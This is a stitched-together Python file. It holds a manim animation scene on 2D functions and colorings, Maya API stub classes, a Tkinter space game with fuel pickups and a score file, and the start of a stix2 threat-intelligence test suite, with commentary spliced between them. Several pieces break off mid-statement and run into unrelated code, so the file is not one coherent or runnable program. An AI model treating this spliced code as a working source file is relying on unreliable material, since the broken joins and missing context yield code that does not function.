rect_image.match_background_image_file(colorings[1])
def update_rect_image(rect_image):
rect_image.points = np.array(rect.points)
rect_image.apply_function(self.point_function)
rect_image_update_anim = UpdateFromFunc(rect_image, update_rect_image)
def get_input_point():
return rect.points[-1]
def get_output_coords():
in_coords = input_plane.point_to_coords(get_input_point())
return self.func(in_coords)
def get_angle():
return angle_of_vector(get_output_coords())
def get_color():
return rev_to_color(get_angle()/TAU) #Negative?
out_vect = Vector(RIGHT, color = WHITE)
out_vect_update_anim = UpdateFromFunc(
out_vect,
lambda ov : ov.put_start_and_end_on(
output_plane.coords_to_point(0, 0),
rect_image.points[-1]
).set_color(get_color())
)
dot = Dot()
dot.set_stroke(BLACK, 1)
dot_update_anim = UpdateFromFunc(
dot, lambda d : d.move_to(get_input_point()).set_fill(get_color())
)
in_vect = Vector(RIGHT)
def update_in_vect(in_vect):
in_vect.put_start_and_end_on(ORIGIN, 0.5*RIGHT)
in_vect.rotate(get_angle())
in_vect.set_color(get_color())
in_vect.shift(get_input_point() - in_vect.get_start())
return in_vect
in_vect_update_anim = UpdateFromFunc(in_vect, update_in_vect)
self.add(colorings, planes, v_line)
self.play(
GrowArrow(out_vect),
GrowArrow(in_vect),
Animation(dot),
)
self.play(
ShowCreation(rect),
ShowCreation(rect_image),
out_vect_update_anim,
in_vect_update_anim,
dot_update_anim,
rate_func = bezier([0, 0, 1, 1]),
run_time = 10,
)
class AskAboutHowToGeneralizeSigns(AltTeacherStudentsScene):
def construct(self):
# 2d plane
plane = NumberPlane(x_radius = 2.5, y_radius = 2.5)
plane.scale(0.8)
plane.to_corner(UP+LEFT)
plane.add_coordinates()
dot = Dot(color = YELLOW)
label = TextMobject("Sign?")
label.add_background_rectangle()
label.scale(0.5)
label.next_to(dot, UP, SMALL_BUFF)
dot.add(label)
dot.move_to(plane.coords_to_point(1, 1))
dot.save_state()
dot.fade(1)
dot.center()
question = TextMobject(
"Wait...what would \\\\ positive and negative \\\\ be in 2d?",
)
# question.set_color_by_tex_to_color_map({
# "+" : "green",
# "textminus" : "red"
# })
self.student_says(
question,
target_mode = "sassy",
student_index = 2,
added_anims = [
self.teacher.change, "plain",
],
bubble_kwargs = {"direction" : LEFT},
run_time = 1,
)
self.play(
Write(plane, run_time = 1),
self.students[0].change, "confused",
self.students[1].change, "confused",
)
self.play(dot.restore)
for coords in (-1, 1), (1, -1), (0, -2), (-2, 1):
self.wait(0.5)
self.play(dot.move_to, plane.coords_to_point(*coords))
self.wait()
class HypothesisAboutFullyColoredBoundary(ColorMappedObjectsScene):
CONFIG = {
"func" : plane_func_from_complex_func(lambda z : z**3),
}
def construct(self):
ColorMappedObjectsScene.construct(self)
square = Square(side_length = 4)
square.color_using_background_image(self.background_image_file)
hypothesis = TextMobject(
"Working Hypothesis: \\\\",
"If a 2d function hits outputs of all possible colors \\\\" +
"on the boundary of a 2d region,",
"that region \\\\ contains a zero.",
alignment = "",
)
hypothesis[0].next_to(hypothesis[1:], UP)
hypothesis[0].set_color(YELLOW)
s = hypothesis[1].get_tex_string()
s = [c for c in s if c not in string.whitespace]
n = s.index("colors")
hypothesis[1][n:n+len("colors")].set_color_by_gradient(
def isZero(*args, **kwargs):
pass
def reorder(*args, **kwargs):
pass
def reorderIt(*args, **kwargs):
pass
def setToAlternateSolution(*args, **kwargs):
pass
def setToClosestCut(*args, **kwargs):
pass
def setToClosestSolution(*args, **kwargs):
pass
def setValue(*args, **kwargs):
pass
def decompose(*args, **kwargs):
pass
__dict__ = None
__weakref__ = None
order = None
thisown = None
x = None
y = None
z = None
__swig_destroy__ = None
identity = None
kXYZ = 0
kXZY = 3
kYXZ = 4
kYZX = 1
kZXY = 2
kZYX = 5
class MURI(_object):
def __eq__(*args, **kwargs):
pass
def __init__(self, *args):
pass
def __ne__(*args, **kwargs):
pass
def __repr__(self):
pass
def addQueryItem(*args, **kwargs):
pass
def asString(*args, **kwargs):
pass
def assign(*args, **kwargs):
pass
def clear(*args, **kwargs):
pass
def copy(*args, **kwargs):
pass
def getAllQueryItemKeys(*args, **kwargs):
pass
def getAllQueryItemValues(*args, **kwargs):
pass
def getAuthority(*args, **kwargs):
pass
def getDirectory(*args, **kwargs):
pass
def getFileName(*args, **kwargs):
pass
def getFragment(*args, **kwargs):
pass
def getHost(*args, **kwargs):
pass
def getPassword(*args, **kwargs):
pass
def getPath(*args, **kwargs):
pass
def getPort(*args, **kwargs):
pass
def getQueryItemValue(*args, **kwargs):
pass
def getQueryPairDelimiter(*args, **kwargs):
pass
def getQueryValueDelimiter(*args, **kwargs):
pass
def getScheme(*args, **kwargs):
pass
def getUserInfo(*args, **kwargs):
pass
def getUserName(*args, **kwargs):
pass
def isEmpty(*args, **kwargs):
pass
def isValid(*args, **kwargs):
pass
def removeAllQueryItems(*args, **kwargs):
pass
def removeQueryItem(*args, **kwargs):
pass
def setAuthority(*args, **kwargs):
pass
def setDirectory(*args, **kwargs):
pass
def setFileName(*args, **kwargs):
pass
def setFragment(*args, **kwargs):
pass
def setHost(*args, **kwargs):
pass
def setPassword(*args, **kwargs):
pass
def setPath(*args, **kwargs):
pass
def setPort(*args, **kwargs):
pass
def setQueryDelimiters(*args, **kwargs):
pass
def setScheme(*args, **kwargs):
pass
def setURI(*args, **kwargs):
pass
def setUserInfo(*args, **kwargs):
pass
def setUserName(*args, **kwargs):
pass
def className(*args, **kwargs):
pass
def isValidURI(*args, **kwargs):
pass
__dict__ = None
__weakref__ = None
thisown = None
__swig_destroy__ = None
class array2dFloat(_object):
def __init__(self, *args):
pass
def __repr__(self):
pass
def get(*args, **kwargs):
pass
def getptr(*args, **kwargs):
pass
def set(*args, **kwargs):
pass
__dict__ = None
__weakref__ = None
thisown = None
__swig_destroy__ = None
class MWeight(_object):
def __init__(self, *args):
pass
def __repr__(self):
pass
def assign(*args, **kwargs):
pass
def influence(*args, **kwargs):
pass
def seam(*args, **kwargs):
pass
def setInfluence(*args, **kwargs):
pass
def setSeam(*args, **kwargs):
pass
def className(*args, **kwargs):
pass
__dict__ = None
__weakref__ = None
thisown = None
__swig_destroy__ = None
class MItSubdEdge(_object):
def __init__(self, *args):
pass
def __repr__(self):
pass
def index(*args, **kwargs):
pass
def isBoundary(*args, **kwargs):
pass
def isDone(*args, **kwargs):
pass
def isSharp(*args, **kwargs):
pass
def isValid(*args, **kwargs):
pass
def level(*args, **kwargs):
pass
def next(*args, **kwargs):
pass
def reset(*args, **kwargs):
pass
def setLevel(*args, **kwargs):
pass
def setSharpness(*args, **kwargs):
pass
def className(*args, **kwargs):
pass
__dict__ = None
__weakref__ = None
thisown = None
__swig_destroy__ = None
class MCacheFormatDescription(_object):
def __init__(self, *args, **kwargs):
pass
def __repr__(self):
pass
def addChannel(*args, **kwargs):
pass
def addDescriptionInfo(*args, **kwargs):
pass
def getChannelDataType(*args, **kwargs):
pass
def getChannelEndTime(*args, **kwargs):
pass
def getChannelInterpretation(*args, **kwargs):
pass
def getChannelName(*args, **kwargs):
pass
def getChannelSamplingRate(*args, **kwargs):
pass
def getChannelSamplingType(*args, **kwargs):
pass
def getChannelStartTime(*args, **kwargs):
pass
def getDescriptionInfo(*args, **kwargs):
pass
def getDistribution(*args, **kwargs):
pass
def getNumChannels(*args, **kwargs):
pass
def getStartAndEndTimes(*args, **kwargs):
pass
def getTimePerFrame(*args, **kwargs):
pass
def setDistribution(*args, **kwargs):
pass
def setTimePerFrame(*args, **kwargs):
pass
def className(*args, **kwargs):
pass
__dict__ = None
__weakref__ = None
thisown = None
kDouble = 1
kDoubleArray = 2
kDoubleVectorArray = 3
kFloatArray = 5
kFloatVectorArray = 6
kInt32Array = 4
kIrregular = 1
kNoFile = 0
kOneFile = 1
kOneFilePerFrame = 2
kRegular = 0
kUnknownData = 0
class MArgList(_object):
def __init__(self, *args):
pass
def __repr__(self):
pass
def addArg(*args, **kwargs):
pass
def asAngle(*args, **kwargs):
pass
def asBool(*args, **kwargs):
pass
def asDistance(*args, **kwargs):
pass
def asDouble(*args, **kwargs):
pass
def asDoubleArray(*args, **kwargs):
pass
def asInt(*args, **kwargs):
pass
def asIntArray(*args, **kwargs):
pass
def asMatrix(*args, **kwargs):
pass
def asPoint(*args, **kwargs):
pass
def asString(*args, **kwargs):
pass
def asStringArray(*args, **kwargs):
pass
def asTime(*args, **kwargs):
pass
def asVector(*args, **kwargs):
pass
def assign(*args, **kwargs):
pass
def flagIndex(*args, **kwargs):
pass
def length(*args, **kwargs):
pass
def className(*args, **kwargs):
pass
__dict__ = None
__weakref__ = None
thisown = None
__swig_destroy__ = None
kInvalidArgIndex = 4294967295
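The sentinel above is worth decoding: `kInvalidArgIndex` appears to be the unsigned 32-bit representation of -1, the conventional C "not found" value returned by lookups such as `flagIndex()`. A quick check:

```python
# kInvalidArgIndex is just -1 stored in an unsigned 32-bit integer,
# i.e. the maximum value a uint32 can hold.
K_INVALID_ARG_INDEX = 4294967295

assert K_INVALID_ARG_INDEX == (1 << 32) - 1      # max uint32
assert K_INVALID_ARG_INDEX == -1 & 0xFFFFFFFF    # unsigned view of -1
```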
class MTimeArray(_object):
def __getitem__(*args, **kwargs):
pass
def __init__(self, *args):
pass
def __repr__(self):
pass
def append(*args, **kwargs):
pass
def assign(*args, **kwargs):
pass
def clear(*args, **kwargs):
pass
def copy(*args, **kwargs):
pass
def insert(*args, **kwargs):
pass
def length(*args, **kwargs):
pass
def remove(*args, **kwargs):
pass
def set(*args, **kwargs):
pass
def setLength(*args, **kwargs):
pass
def setSizeIncrement(*args, **kwargs):
pass
def sizeIncrement(*args, **kwargs):
pass
def className(*args, **kwargs):
pass
__dict__ = None
__weakref__ = None
thisown = None
__swig_destroy__ = None
class MQuaternion(_object):
def __add__(*args, **kwargs):
pass
def __eq__(*args, **kwargs):
pass
def __getitem__(*args, **kwargs):
pass
def __imul__(*args, **kwargs):
pass
def __init__(self, *args):
pass
def __iter__(self):
"""
Iterates on all components of a Maya api Quaternion
"""
pass
def __len__(self):
"""
Number of components in the Maya api Quaternion, ie 4
"""
pass
def __mul__(*args, **kwargs):
pass
def __ne__(*args, **kwargs):
pass
def __neg__(*args, **kwargs):
pass
def __repr__(self):
pass
def __sub__(*args, **kwargs):
pass
def asEulerRotation(*args, **kwargs):
pass
def asMatrix(*args, **kwargs):
pass
def assign(*args, **kwargs):
pass
def conjugate(*args, **kwargs):
pass
def conjugateIt(*args, **kwargs):
pass
def exp(*args, **kwargs):
pass
def get(*args, **kwargs):
pass
def getAxisAngle(*args, **kwargs):
pass
def inverse(*args, **kwargs):
pass
def invertIt(*args, **kwargs):
pass
def isEquivalent(*args, **kwargs):
pass
def log(*args, **kwargs):
pass
def negateIt(*args, **kwargs):
pass
def normal(*args, **kwargs):
pass
def normalizeIt(*args, **kwargs):
pass
def scaleIt(*args, **kwargs):
pass
def setAxisAngle(*args, **kwargs):
pass
def setToXAxis(*args, **kwargs):
pass
def setToYAxis(*args, **kwargs):
pass
def setToZAxis(*args, **kwargs):
pass
__dict__ = None
__weakref__ = None
thisown = None
w = None
x = None
y = None
z = None
__swig_destroy__ = None
identity = None
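The MQuaternion stub lists only signatures. As a minimal pure-Python sketch (NOT the Maya API) of what two of its core operations compute — `setAxisAngle` and quaternion multiplication — with components ordered (x, y, z, w) to match the stub's attributes:

```python
import math

# Build a unit quaternion from a rotation axis and an angle in radians,
# the operation MQuaternion.setAxisAngle performs.
def quat_from_axis_angle(axis, angle):
    ax, ay, az = axis
    n = math.sqrt(ax * ax + ay * ay + az * az)
    s = math.sin(angle / 2.0) / n
    return (ax * s, ay * s, az * s, math.cos(angle / 2.0))

# Hamilton product, the operation behind __mul__: composes two rotations.
def quat_mul(q1, q2):
    x1, y1, z1, w1 = q1
    x2, y2, z2, w2 = q2
    return (
        w1 * x2 + x1 * w2 + y1 * z2 - z1 * y2,
        w1 * y2 - x1 * z2 + y1 * w2 + z1 * x2,
        w1 * z2 + x1 * y2 - y1 * x2 + z1 * w2,
        w1 * w2 - x1 * x2 - y1 * y2 - z1 * z2,
    )

# Two 90-degree rotations about Z compose into one 180-degree rotation.
q90 = quat_from_axis_angle((0, 0, 1), math.pi / 2)
q180 = quat_mul(q90, q90)
```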
class MItSubdFace(_object):
def __init__(self, *args):
pass
if Sy < round(0 + 400 * math.sin(tel)) and Sx > round(1200 + 400 * math.cos(tel)): # 1200, 0
inn = True
if Sy < round(0 + 300 * math.sin(tel)) and Sx > round(1200 + 300 * math.cos(tel)):
dod = True
break
tel = round(tel + 0.01, 2)
elif room == "R4":
tel = 0
for a in range(628):
if Sy < round(0 + 400 * math.sin(tel)) and Sx < round(0 + 400 * math.cos(tel)): # 0, 0
inn = True
if Sy < round(0 + 300 * math.sin(tel)) and Sx < round(0 + 300 * math.cos(tel)):
dod = True
break
tel = round(tel + 0.01, 2)
if inn:
if dod:
for a in sol:
canvas.delete(a)
destroy(15)
else:
sol.append(canvas.create_text(wW / 2, wH / 2, text="Heat Warning!", fill="white"))
if room == "sR1" or room == "sR2" or room == "sR3":
homeSS()
else:
homeS()
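The loops above sample 628 angle steps to decide whether the ship has entered a planet's warning radius (400) or destruction radius (300). A direct Euclidean distance test answers the same inside-the-circle question in one step; this is a sketch with a hypothetical helper, reusing the R4 planet centre (0, 0) from the code above:

```python
import math

# A point is inside a circle iff its distance to the centre is below
# the radius -- no angle sampling needed.
def in_circle(px, py, cx, cy, r):
    return math.hypot(px - cx, py - cy) < r

# Warning zone (r=400) vs destruction zone (r=300) around the R4 planet:
inn = in_circle(50, 50, 0, 0, 400)   # heat warning
dod = in_circle(50, 50, 0, 0, 300)   # destroyed
```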
# Function for when the ship is out of fuel
def emty():
global dod
global sol
dod = True
canvas.bind("<Key>", dead)
for a in sol:
canvas.delete(a)
user()
canvas.create_text(wW / 2, wH / 2, text="Ship is out of fuel!", fill="white")
canvas.create_rectangle((wW / 2) - 50, (wH / 2) + 10, (wW / 2) + 50, (wH / 2) + 50, fill="grey")
canvas.create_text(wW / 2, (wH / 2) + 30, text="Restart", fill="white", anchor="center")
# Dead handler (just so that once you are dead you cannot keep playing)
def dead(key):
pass
# When you die
def destroy(boom):
global canvas
global listi
global sol
global wW
global wH
canvas.create_circle(Sx, Sy, boom, fill="orange")
for a in listi:
canvas.delete(a)
canvas.bind("<Key>", dead)
user()
canvas.create_text(wW / 2, wH / 2, text="Ship destroyed!", fill="white")
canvas.create_rectangle((wW / 2) - 50, (wH / 2) + 10, (wW / 2) + 50, (wH / 2) + 50, fill="grey")
canvas.create_text(wW / 2, (wH / 2) + 30, text="Restart", fill="white", anchor="center")
def user():
global wW
global wH
global e1
e1 = Entry(canvas)
canvas.create_text(wW / 2, (wH / 2) + 60, text="Enter your user name", fill="white")
canvas.create_window(wW / 2, (wH / 2) + 80, window=e1)
# When the mouse button is pressed
def callback(event):
global canvas
global dod
global tel
global e1
canvas.focus_set()
print("clicked at", event.x, event.y)
if dod:
if event.x > (wW / 2) - 50 and event.y > (wH / 2) + 10 and event.x < (wW / 2) + 50 and event.y < (wH / 2) + 50:
nafn = e1.get()
if nafn != "":
entry = ","+nafn+":"+str(tel)
with open("scores.txt","a") as f:
f.write(entry)
reset()
# Create a new dot (fuel pickup)
def new_dot():
global canvas
global speed
global dot
global tel
tel += 1
global Dx
global Dy
global Dr
global rooms
global room
global dtel
Dx = random.randint(0, 1200)
Dy = random.randint(0, 900)
Dr = random.choice(rooms)
tel1 = 0
for a in range(628):
if Dr == "R1":
print("Y:", Dy)
print("X:", Dx)
print("Ry:", round(900 + 300 * math.sin(tel)))
print("Rx:", round(1200 + 300 * math.cos(tel)))
if Dy > round(900 + 300 * math.sin(tel1)) and Dx > round(1200 + 300 * math.cos(tel1)):
print("yay!!")
new_dot()
elif Dr == "R2":
if Dy > round(900 + 300 * math.sin(tel1)) and Dx < round(0 + 300 * math.cos(tel1)):
new_dot()
elif Dr == "R3":
if Dy < round(0 + 300 * math.sin(tel1)) and Dx > round(1200 + 300 * math.cos(tel1)):
new_dot()
elif Dr == "R4":
if Dy < round(0 + 300 * math.sin(tel1)) and Dx < round(0 + 300 * math.cos(tel1)):
new_dot()
tel1 = round(tel1 + 0.01, 2)
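`new_dot` above re-rolls by calling itself whenever the random dot lands inside a planet, which risks deep recursion and also lets the outer angle loop keep running after the recursive call returns. An iterative rejection-sampling sketch (a hypothetical helper, not part of the game) avoids both:

```python
import math
import random

# Keep drawing positions until one falls outside the blocked circle,
# instead of recursing like new_dot does.
def sample_outside_circle(cx, cy, r, width=1200, height=900, rng=random):
    while True:
        x = rng.randint(0, width)
        y = rng.randint(0, height)
        if math.hypot(x - cx, y - cy) >= r:
            return x, y

# e.g. avoid the R1 planet centred at (1200, 900) with radius 300:
x, y = sample_outside_circle(1200, 900, 300)
```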
# print(tel)
# Main screen inside the spaceship
def homeSS():
global canvas
global dot
global Cx
global Cy
global listi
canvas.delete(dot)
listi = []
listi.append(canvas.create_circle(Cx, Cy, 50, fill="white", outline=""))
# Main screen in space
def homeS():
global canvas
global dot
canvas.delete(dot)
global Sx
global Sy
global listi
listi = []
global fY
global room
global Dr
global dod
global maxfuel
global fuel
global wW
global wH
if room == Dr:
dot = canvas.create_circle(Dx, Dy, 3, fill="yellow")
try:
with open("scores.txt","r") as f:
text = f.read()
users = text.split(",")
telja = 0
for a in users:
nota = a.split(":")
if len(nota) < 2:
continue
if int(nota[1]) > int(telja):
nafn = nota[0]
telja = nota[1]
listi.append(canvas.create_text(wW/2, 0, text="Top user: " + nafn + " : " + str(telja), fill="white", anchor=N))
except:
listi.append(
canvas.create_text(wW / 2, 0, text="Top user: None", fill="white", anchor=N))
if not dod:
if fY == "s":
listi.append(canvas.create_circle(Sx, Sy - 8, 3, fill="lightblue", outline=""))
elif fY == "w":
listi.append(canvas.create_circle(Sx, Sy + 2, 3, fill="lightblue", outline=""))
elif fY == "a":
listi.append(canvas.create_circle(Sx + 2, Sy, 3, fill="lightblue", outline=""))
elif fY == "d":
listi.append(canvas.create_circle(Sx - 8, Sy, 3, fill="lightblue", outline=""))
if fY == "s" or fY == "w":
listi.append(canvas.create_circle(Sx, Sy, 3, fill="grey", outline=""))
listi.append(canvas.create_circle(Sx, Sy - 2, 3, fill="grey", outline=""))
listi.append(canvas.create_circle(Sx, Sy - 4, 3, fill="grey", outline=""))
listi.append(canvas.create_circle(Sx, Sy - 6, 3, fill="grey", outline=""))
elif fY == "a" or fY == "d":
listi.append(canvas.create_circle(Sx, Sy, 3, fill="grey", outline=""))
listi.append(canvas.create_circle(Sx - 2, Sy, 3, fill="grey", outline=""))
listi.append(canvas.create_circle(Sx - 4, Sy, 3, fill="grey", outline=""))
listi.append(canvas.create_circle(Sx - 6, Sy, 3, fill="grey", outline=""))
if Sx - 3 <= Dx + 3 and Sx + 3 >= Dx - 3 and Sy - 3 <= Dy + 3 and Sy + 3 >= Dy - 3 and room == Dr:
fuel = fuel + 10
if fuel > maxfuel:
fuel = maxfuel
new_dot()
if fuel == 0:
emty()
listi.append(canvas.create_text(wW - 10, 10, text="Score: " + str(tel), width=100, anchor=NE, fill="white"))
listi.append(canvas.create_text(0 + 10, 10, text="Fuel: " + str(fuel), width=100, anchor=NW, fill="white"))
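`homeS` above walks the score file with a manual comparison loop; `callback` writes each entry as `"," + name + ":" + score`, so the file looks like `",alice:12,bob:30"` with a leading empty field. A sketch (hypothetical helper) of the same lookup using `max()` with a key, skipping the empty field:

```python
# Find the top entry in a scores string shaped like ",alice:12,bob:30".
def best_score(text):
    entries = [e for e in text.split(",") if ":" in e]
    if not entries:
        return None, 0
    name, score = max(
        (e.split(":", 1) for e in entries),
        key=lambda pair: int(pair[1]),
    )
    return name, int(score)
```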
# Create the stars
def stars(numb, x1, y1, x2, y2):
global canvas
for a in range(numb):
x = random.randint(x1, x2)
y = random.randint(y1, y2)
star.append(canvas.create_circle(x, y, 1, fill="white", outline=""))
# Room 1 in space
def R1():
global canvas
global dot
global room
room = "R1"
canvas.delete(dot)
for a in planets:
canvas.delete(a)
planets.append(canvas.create_circle(100, 120, 50, fill="blue", outline="lightblue", width=4))
planets.append(canvas.create_circle_arc(100, 120, 48, fill="green", outline="", start=45, end=140))
planets.append(canvas.create_circle_arc(100, 120, 48, fill="green", outline="", start=275, end=305))
planets.append(canvas.create_circle_arc(100, 120, 45, style="arc", outline="white", width=6, start=270 - 25,
end=270 + 25))
planets.append(canvas.create_circle(150, 40, 20, fill="#BBB", outline=""))
planets.append(canvas.create_circle(140, 40, 2, fill="darkgrey", outline=""))
planets.append(canvas.create_circle(160, 50, 4, fill="darkgrey", outline=""))
planets.append(canvas.create_circle(160, 30, 3, fill="darkgrey", outline=""))
planets.append(canvas.create_circle(1200, 900, 300, fill="#FF5C00"))
planets.append(canvas.create_circle(1200, 900, 400, outline="#FF5C00"))
# Room 2 in space
def R2():
global canvas
global dot
global room
room = "R2"
canvas.delete(dot)
for a in planets:
canvas.delete(a)
planets.append(canvas.create_circle(0, 900, 300, fill="#FF5C00"))
planets.append(canvas.create_circle(0, 900, 400, outline="#FF5C00"))
planets.append(canvas.create_circle(900, 500, 45, fill="red"))
planets.append(canvas.create_circle(880, 520, 10, fill="#E82A00", outline=""))
planets.append(canvas.create_circle(920, 520, 8, fill="#E82A00", outline=""))
planets.append(canvas.create_circle(900, 480, 5, fill="#E82A00", outline=""))
planets.append(canvas.create_circle(500, 100, 60, fill="#FFA30B", outline="#FFBD05", width=4))
# Room 3 in space
def R3():
global canvas
global dot
global room
room = "R3"
canvas.delete(dot)
for a in planets:
canvas.delete(a)
planets.append(canvas.create_circle(1200, 0, 300, fill="#FF5C00"))
planets.append(canvas.create_circle(1200, 0, 400, outline="#FF5C00"))
# Room 4 in space
def R4():
global canvas
global dot
global room
room = "R4"
canvas.delete(dot)
for a in planets:
canvas.delete(a)
planets.append(canvas.create_circle(0, 0, 300, fill="#FF5C00"))
planets.append(canvas.create_circle(0, 0, 400, outline="#FF5C00"))
planets.append(canvas.create_circle(900, 600, 150, fill="#FFA700"))
planets.append(canvas.create_circle(900, 600, 225, outline="#FFE100", width=40))
# Room 1 in the spaceship
def sR1():
global canvas
global dot
global wW
global wH
global Seatx
global Seaty
global room
room = "sR1"
canvas.delete(dot)
for a in planets:
canvas.delete(a)
planets.append(canvas.create_rectangle(0, 200, (wW / 4) * 3, 700, fill="darkgrey"))
planets.append(canvas.create_polygon(900, 200, wW, wH / 2, 900, 700, fill="darkgrey"))
planets.append(
canvas.create_rectangle(Seatx - 50, Seaty - 50, Seatx + 50, Seaty + 50, fill="brown", outline=""))
# Room 2 in the spaceship
def sR2():
global canvas
global wW
global wH
global room
room = "sR2"
for a in planets:
canvas.delete(a)
planets.append(canvas.create_rectangle(0, 200, wW, 700, fill="darkgrey"))
# Room 3 in the spaceship
def sR3():
global canvas
global wW
global wH
global room
room = "sR3"
for a in planets:
canvas.delete(a)
planets.append(canvas.create_circle(300, wH / 2, 250, fill="lightblue", outline=""))
planets.append(canvas.create_rectangle(300, 200, wW, 700, fill="darkgrey", outline=""))
root = Tk()
reset()
root.mainloop()
# Function that handles rock, paper, scissors
def sbs():
global tel1
global tel2
global tel3
tel1 = 0
tel2 = 0
tel3 = 0
for a in root.winfo_children():
# stix2/test/v21/test_environment.py
import os
import pytest
import stix2
import stix2.environment
import stix2.equivalence.graph
import stix2.equivalence.object
import stix2.exceptions
from .constants import (
ATTACK_PATTERN_ID, ATTACK_PATTERN_KWARGS, CAMPAIGN_ID, CAMPAIGN_KWARGS,
FAKE_TIME, IDENTITY_ID, IDENTITY_KWARGS, INDICATOR_ID, INDICATOR_KWARGS,
LOCATION_ID, LOCATION_KWARGS, MALWARE_ID, MALWARE_KWARGS, RELATIONSHIP_IDS,
REPORT_ID, REPORT_KWARGS, THREAT_ACTOR_ID, THREAT_ACTOR_KWARGS, TOOL_ID,
TOOL_KWARGS, VULNERABILITY_ID, VULNERABILITY_KWARGS,
)
FS_PATH = os.path.join(os.path.dirname(os.path.realpath(__file__)), "stix2_data")
@pytest.fixture
def ds():
cam = stix2.v21.Campaign(id=CAMPAIGN_ID, **CAMPAIGN_KWARGS)
idy = stix2.v21.Identity(id=IDENTITY_ID, **IDENTITY_KWARGS)
ind = stix2.v21.Indicator(id=INDICATOR_ID, **INDICATOR_KWARGS)
mal = stix2.v21.Malware(id=MALWARE_ID, **MALWARE_KWARGS)
rel1 = stix2.v21.Relationship(ind, 'indicates', mal, id=RELATIONSHIP_IDS[0])
rel2 = stix2.v21.Relationship(mal, 'targets', idy, id=RELATIONSHIP_IDS[1])
rel3 = stix2.v21.Relationship(cam, 'uses', mal, id=RELATIONSHIP_IDS[2])
reprt = stix2.v21.Report(
name="Malware Report", published="2021-05-09T08:22:22Z",
object_refs=[mal.id, rel1.id, ind.id],
)
stix_objs = [cam, idy, ind, mal, rel1, rel2, rel3, reprt]
yield stix2.MemoryStore(stix_objs)
@pytest.fixture
def ds2():
cam = stix2.v21.Campaign(id=CAMPAIGN_ID, **CAMPAIGN_KWARGS)
idy = stix2.v21.Identity(id=IDENTITY_ID, **IDENTITY_KWARGS)
ind = stix2.v21.Indicator(id=INDICATOR_ID, created_by_ref=idy.id, **INDICATOR_KWARGS)
indv2 = ind.new_version(
external_references=[
{
"source_name": "unknown",
"url": "https://examplewebsite.com/",
},
],
object_marking_refs=[stix2.v21.TLP_WHITE],
)
mal = stix2.v21.Malware(id=MALWARE_ID, created_by_ref=idy.id, **MALWARE_KWARGS)
malv2 = mal.new_version(
external_references=[
{
"source_name": "unknown",
"url": "https://examplewebsite2.com/",
},
],
)
rel1 = stix2.v21.Relationship(ind, 'indicates', mal, id=RELATIONSHIP_IDS[0])
rel2 = stix2.v21.Relationship(mal, 'targets', idy, id=RELATIONSHIP_IDS[1])
rel3 = stix2.v21.Relationship(cam, 'uses', mal, id=RELATIONSHIP_IDS[2])
stix_objs = [cam, idy, ind, indv2, mal, malv2, rel1, rel2, rel3]
reprt = stix2.v21.Report(
created_by_ref=idy.id, name="example",
published="2021-04-09T08:22:22Z", object_refs=stix_objs,
)
stix_objs.append(reprt)
yield stix2.MemoryStore(stix_objs)
def test_object_factory_created_by_ref_str():
factory = stix2.ObjectFactory(created_by_ref=IDENTITY_ID)
ind = factory.create(stix2.v21.Indicator, **INDICATOR_KWARGS)
assert ind.created_by_ref == IDENTITY_ID
def test_object_factory_created_by_ref_obj():
id_obj = stix2.v21.Identity(id=IDENTITY_ID, **IDENTITY_KWARGS)
factory = stix2.ObjectFactory(created_by_ref=id_obj)
ind = factory.create(stix2.v21.Indicator, **INDICATOR_KWARGS)
assert ind.created_by_ref == IDENTITY_ID
def test_object_factory_override_default():
factory = stix2.ObjectFactory(created_by_ref=IDENTITY_ID)
new_id = "identity--983b3172-44fe-4a80-8091-eb8098841fe8"
ind = factory.create(stix2.v21.Indicator, created_by_ref=new_id, **INDICATOR_KWARGS)
assert ind.created_by_ref == new_id
def test_object_factory_created():
factory = stix2.ObjectFactory(created=FAKE_TIME)
ind = factory.create(stix2.v21.Indicator, **INDICATOR_KWARGS)
assert ind.created == FAKE_TIME
assert ind.modified == FAKE_TIME
def test_object_factory_external_reference():
ext_ref = stix2.v21.ExternalReference(
source_name="ACME Threat Intel",
description="Threat report",
)
factory = stix2.ObjectFactory(external_references=ext_ref)
ind = factory.create(stix2.v21.Indicator, **INDICATOR_KWARGS)
assert ind.external_references[0].source_name == "ACME Threat Intel"
assert ind.external_references[0].description == "Threat report"
ind2 = factory.create(stix2.v21.Indicator, external_references=None, **INDICATOR_KWARGS)
assert 'external_references' not in ind2
def test_object_factory_obj_markings():
stmt_marking = stix2.v21.StatementMarking("Copyright 2016, Example Corp")
mark_def = stix2.v21.MarkingDefinition(
definition_type="statement",
definition=stmt_marking,
)
factory = stix2.ObjectFactory(object_marking_refs=[mark_def, stix2.v21.TLP_AMBER])
ind = factory.create(stix2.v21.Indicator, **INDICATOR_KWARGS)
assert mark_def.id in ind.object_marking_refs
assert stix2.v21.TLP_AMBER.id in ind.object_marking_refs
factory = stix2.ObjectFactory(object_marking_refs=stix2.v21.TLP_RED)
ind = factory.create(stix2.v21.Indicator, **INDICATOR_KWARGS)
assert stix2.v21.TLP_RED.id in ind.object_marking_refs
def test_object_factory_list_append():
ext_ref = stix2.v21.ExternalReference(
source_name="ACME Threat Intel",
description="Threat report from ACME",
)
ext_ref2 = stix2.v21.ExternalReference(
source_name="Yet Another Threat Report",
description="Threat report from YATR",
)
ext_ref3 = stix2.v21.ExternalReference(
source_name="Threat Report #3",
description="One more threat report",
)
factory = stix2.ObjectFactory(external_references=ext_ref)
ind = factory.create(stix2.v21.Indicator, external_references=ext_ref2, **INDICATOR_KWARGS)
assert ind.external_references[1].source_name == "Yet Another Threat Report"
ind = factory.create(stix2.v21.Indicator, external_references=[ext_ref2, ext_ref3], **INDICATOR_KWARGS)
assert ind.external_references[2].source_name == "Threat Report #3"
def test_object_factory_list_replace():
ext_ref = stix2.v21.ExternalReference(
source_name="ACME Threat Intel",
description="Threat report from ACME",
)
ext_ref2 = stix2.v21.ExternalReference(
source_name="Yet Another Threat Report",
description="Threat report from YATR",
)
factory = stix2.ObjectFactory(external_references=ext_ref, list_append=False)
ind = factory.create(stix2.v21.Indicator, external_references=ext_ref2, **INDICATOR_KWARGS)
assert len(ind.external_references) == 1
assert ind.external_references[0].source_name == "Yet Another Threat Report"
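The ObjectFactory tests above all exercise the same idea: a factory holds preset keyword arguments and merges them into every `create()` call, with per-call values winning. A generic sketch of that pattern (not stix2's implementation):

```python
# Defaults-merging factory: preset kwargs are applied to every create()
# call; kwargs passed at the call site override them.
class DefaultsFactory:
    def __init__(self, **defaults):
        self.defaults = defaults

    def create(self, cls, **kwargs):
        merged = {**self.defaults, **kwargs}  # call-site kwargs win
        return cls(**merged)

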